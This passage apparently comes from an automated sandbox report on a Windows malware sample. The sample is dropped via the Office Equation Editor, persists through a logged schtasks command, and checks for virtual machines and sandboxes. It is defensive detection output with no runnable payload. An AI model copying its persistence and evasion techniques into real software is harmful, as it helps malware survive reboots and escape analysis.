                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0136808F push es; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_004583D6 push ss; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00459CD6 push esp; retn 003Fh
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00457F9B push ebp; retf
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D5B15F pushad ; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D5B169 pushad ; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D55BD0 push esp; ret
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D5232C push esi; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0136808F push es; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00450D48 pushad ; retf
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00451508 pushad ; iretd
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.94722535195
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.94722535195
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.94722535195
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile created: C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exeJump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Code function: 7_2_00405174 sldt word ptr [eax]
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Window / User API: threadDelayed 9416
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1296 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2468 | Thread sleep time: -103327s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2468 | Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2744 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2800 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2420 | Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2476 | Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2476 | Thread sleep time: -120000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2936 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Thread delayed: delay time: 103327
